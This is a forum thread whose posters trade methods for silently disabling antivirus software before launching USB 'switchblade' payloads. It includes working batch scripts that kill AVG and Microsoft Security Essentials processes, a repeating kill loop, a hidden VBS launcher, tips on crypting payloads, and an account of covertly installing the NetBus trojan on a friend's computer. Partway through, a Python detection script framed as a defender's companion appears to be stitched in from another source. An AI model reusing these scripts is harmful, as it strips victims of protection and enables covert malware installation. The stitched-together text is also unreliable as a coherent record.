Alternative Method to Kill AV's.


Abigwar
Any good AV app, like ESET, and the others that have been mentioned will auto restart, or produce alerts if they try to be killed.

Notice how ekrn.exe and egui.exe are not in the metasploit list? That's because when killed, they immediately restart. Well, ekrn does anyway; egui is just the frontend, and even if you do lose that, the warnings still appear.

But still, a better solution than simply process killing would be great :)


** Random Thought **

What about a method that involves forcing the process to shutdown but when it restarts it is forced to restart in a sandboxed environment rendering it useless to the system. As for the pop-up messages what about a monitor refresh triggered by the pop-up. This would blank the screen for a moment giving the pop-up time to fade. Although the screen blanking out would be an indicator many users would just think it was a minor glitch.

*Extremely Crude* Alternatively, use an AutoIt script to hide the cursor, take a screenshot, hide the taskbar and replace the background with the screenshot, then switch back to the original settings after the payload runs.

I'll begin the research to see if this is possible but wanted to get some thoughts on this.


  • 3 months later...

Hey, did you guys think of cleaning the whole .exe program with VBA, VB or VBS? You can let your program check if the path exists and then open the .exe and let it type something like "lol you just got hacked". Then on next startup delete registry values and make a virus downloader. The code looks like this:

MyFile = "C:\Program files\kaspersky 2009" & "kaspersky.exe"
fnum = FreeFile()
Open MyFile For Output As fnum
Print #fnum, "this doesn't work anymore"
Close #fnum

And before this code you could run a check to see if the path exists.

Now I am going back to gaming, bye bye :ph34r:


I was thinking, if the file was edited in the correct procedure there would be minimal work to undetect these before compiling.

i.e., the resulting exe will either need crypting or hexing; if one person kept up-to-date undetected files on a server then that might prove useful; if the file was crypted then all firewalls and AV will not flag them; if a half-decent crypter was used it could just run in RAM memory. HMMM, what do you think?


  • 1 month later...

Lol, how's that gonna work when kaspersky.exe is already running?

By the way guys maybe look into ZwTerminateProcess? It should be able to close any process whenever you want :)


  • 2 weeks later...

hi to all,

I'm new to this community, as you can probably guess from the amount of posts I have made.. :)

And English is not my strongest side, so you'll have to excuse my grammar and spelling...

I had a problem similar to what you guys describe, and my solution was some kind of social engineering.

I was trying to load an old trojan (NetBus.. don't ask, I'm not that lame, it was a bet..) on a friend's PC, but the bu%#$d had Kaspersky running, and I couldn't find any way to turn it off, so I did the exact opposite: I made a batch file that made the security so tight my friend couldn't work. In the same batch file I added several if statements that checked if Kaspersky was running, and when it found out it wasn't, a second file I had inserted into his boot downloaded and executed NetBus and notified me...

What happened was that, like I hoped, my friend got frustrated with Kaspersky so he uninstalled it.

The DOS commands for doing this trick actually came from the Kaspersky forums, and of course I knew in advance that he uses Kaspersky..

anyway, just another idea..


I thought that you could somehow patch the AV like any other program, make the patch start before the AV (probably get it RING 0 privileges), so ASM would be the right choice. But there is a problem I know with NOD32: if any program tries to change it, it detects the change and asks if you want to allow it. I don't know about other AVs, and neither do I know if it would check its own code if you change it before the start, but it might work.


  • 2 months later...
Ok guys, we all know that the AVKill (csrss.exe) we use for our switchblades is outdated and flagged by every AV known. So I wanted to come up with an alternative method of killing AVs before launching our switchblades. If this works out, I think it would be a great addition to Leapos Pocket Knife.

What I decided to try was using Nircmd's processkill command to eliminate the AV processes. I was concerned that the AV would recognize the attempt and block it, or alert. For AVs such as Avast, we would want to make sure we mute the system speakers. (Note: we would want to do that anyway, because if Avast flags a virus it screams "A VIRUS HAS BEEN DETECTED".) Anyway, if a certain AV alerts to the attempt to kill its process, what is the difference, because it is going to alert to running csrss.exe and some of our other tools. So long as it isn't audible, we still have time to get in and out without immediate detection.

I tested this on AVG and it worked flawlessly and silently.

::Abigwar's First Attempt at Batch AVkiller

::Mute the system volume, in case of audible AV Alerts (Avast!)
nircmd mutesysvolume 1

::Kill AVG Command Center
nircmd killprocess avgcc.exe

::Kill other AVG Processes
nircmd killprocess avgemc.exe
nircmd killprocess avgupsvc.exe
nircmd killprocess avgamsvr.exe

::Restore system volume at end of switchblade
nircmd mutesysvolume 0

Now what I would like to ask from all of you is to look at your system processes and let's make a list of the processes each virus scanner uses. When we have them all listed, we can then script it into the batch to kill all the applicable processes. We also need to see how each AV reacts to the attempt to kill its processes.

One other thing I was considering: if an AV's process is persistent, we could loop the batch file to continue to run, and kill the process over and over. How that could work is we would call the separate Anti-AV batch file from the start.bat or go.bat, and let it loop until the switchblade ends. So at the end of the switchblade we would create a text file on the thumbdrive. The loop would stop when it sees the file, then delete it to make it ready for next time and end.

::Theoretical Loop batch

:Start
nircmd killprocess avgcc.exe
nircmd killprocess avgemc.exe
nircmd killprocess avgupsvc.exe
nircmd killprocess avgamsvr.exe

IF EXIST SWITCHDONE.TXT GOTO END
GOTO START
:END
delete switchdone.txt

A pretty detailed list of AV processes can be found here:

http://dev.metasploit.com/redmine/projects...reter/killav.rb


  • 8 months later...

It took me hours but I've finally got Microsoft Security Essentials to disable itself.

Now the only issue I have is on Windows 7 Ultimate 64-bit: when the antivirus shuts off, the Action Center displays a message saying "turn on Microsoft Security Essentials".

I take it I need some code before this to disable Action Center from displaying messages.

Should I look at a reg setting or a group policy setting?

I tried net stop wscsvc (Security Center service) but it displays that it's turned itself off.

Please help.

I've got 2 bat files and a vbs file (as this is the only way I could find to run the cmd prompt invisibly; is there a better way to do this?).

Here is the code I've got so far:

launch.bat

wscript.exe "invis.vbs" "MS Security Essentials off.bat"

invis.vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

MS Security Essentials off.bat

Echo off
net stop MsMpSvc
process.exe -k MsMpEng.exe
process.exe -k msseces.exe

The process.exe is an app called Command Line Process Viewer/Killer/Suspender.

It is the only way I found successful to kill the MSE .exe's.

You can download it HERE

and here's how to use the switches: Link

Any suggestions to tidy up my code would be great.

rod

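A defender-side companion to the process-kill, kill-loop and `net stop` techniques discussed in this thread (an added example, not code from any poster): it runs simple detection logic over constructed Sysmon-style process-creation lines and Service Control Manager stop events, flagging terminations of the AV processes named here, stops of the MSE and Security Center services, and the repeated-kill loop pattern. The event field layout, the `EID=` prefix and the `LOOP_THRESHOLD` value are assumptions.

```python
import re
from collections import Counter

# Process and service names of the AV products named in this thread (MSE, AVG, ESET).
AV_PROCESSES = {"avgcc.exe", "avgemc.exe", "avgupsvc.exe", "avgamsvr.exe",
                "msmpeng.exe", "msseces.exe", "ekrn.exe", "egui.exe"}
AV_SERVICES = {"msmpsvc", "wscsvc"}

# Command shapes seen in the thread (nircmd killprocess, process.exe -k, net stop)
# plus the built-in taskkill /im, which a detection should cover as well.
KILL_RE = re.compile(
    r"(?:nircmd(?:\.exe)?\s+killprocess|process(?:\.exe)?\s+-k"
    r"|taskkill(?:\.exe)?\s+(?:/f\s+)?/im)\s+\"?([\w.]+)", re.IGNORECASE)
STOP_RE = re.compile(r"net(?:\.exe)?\s+stop\s+\"?(\w+)", re.IGNORECASE)
# Service Control Manager "entered the stopped state" event (EID 7036); layout assumed.
SVC_RE = re.compile(r"EID=7036\s+Service=(\w+)\s+State=stopped", re.IGNORECASE)
LOOP_THRESHOLD = 3  # assumed: same AV process killed this often -> kill loop

# Constructed sample: an MSE service stop, a kill loop against AVG, one benign kill.
SAMPLE_LOG = [
    r"10:00:01 EID=1 Image=C:\Windows\System32\net.exe CommandLine=net stop MsMpSvc",
    r"10:00:01 EID=7036 Service=MsMpSvc State=stopped",
    r"10:00:02 EID=1 Image=E:\process.exe CommandLine=process.exe -k MsMpEng.exe",
    r"10:00:03 EID=1 Image=E:\nircmd.exe CommandLine=nircmd killprocess avgcc.exe",
    r"10:00:04 EID=1 Image=E:\nircmd.exe CommandLine=nircmd killprocess avgcc.exe",
    r"10:00:05 EID=1 Image=E:\nircmd.exe CommandLine=nircmd killprocess avgcc.exe",
    r"10:00:07 EID=1 Image=C:\Windows\System32\taskkill.exe CommandLine=taskkill /f /im calc.exe",
]

def analyze(lines):
    """Return (kind, target, evidence) tuples for every AV-tampering indicator."""
    findings, kills = [], Counter()
    for line in lines:
        m = KILL_RE.search(line)
        if m and m.group(1).lower() in AV_PROCESSES:      # kill aimed at an AV process
            kills[m.group(1).lower()] += 1
            findings.append(("av_process_kill", m.group(1).lower(), line))
            continue
        m = STOP_RE.search(line)
        if m and m.group(1).lower() in AV_SERVICES:       # net stop of an AV service
            findings.append(("av_service_stop_cmd", m.group(1).lower(), line))
            continue
        m = SVC_RE.search(line)
        if m and m.group(1).lower() in AV_SERVICES:       # SCM confirms the service stopped
            findings.append(("av_service_stopped", m.group(1).lower(), line))
    for target, n in kills.items():                       # persistent re-kill loop
        if n >= LOOP_THRESHOLD:
            findings.append(("av_kill_loop", target, f"{n} kill attempts"))
    return findings
```

Kills of non-AV processes (the `calc.exe` line) are deliberately ignored so the rule stays quiet on ordinary administration.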

  • 3 months later...

If it helps, here are some scripts I found a while ago to easily escalate Windows privileges (at least in XP, as far as I have tested). I used them to allow my (under-)privileged account at school to run a batch file that installed Portal on one of the AutoCAD boxes in school :D

It consists of 3 scripts to elevate the current process to one run as Admin or even Power User (Windows equivalent of root). I don't know if it'll be of any use, but here it is anyways.

http://www.filedude.com/download/RVSJ3rYkIR3c55e742fe

Side Note: Why can't we upload zip files via the forum attachments?

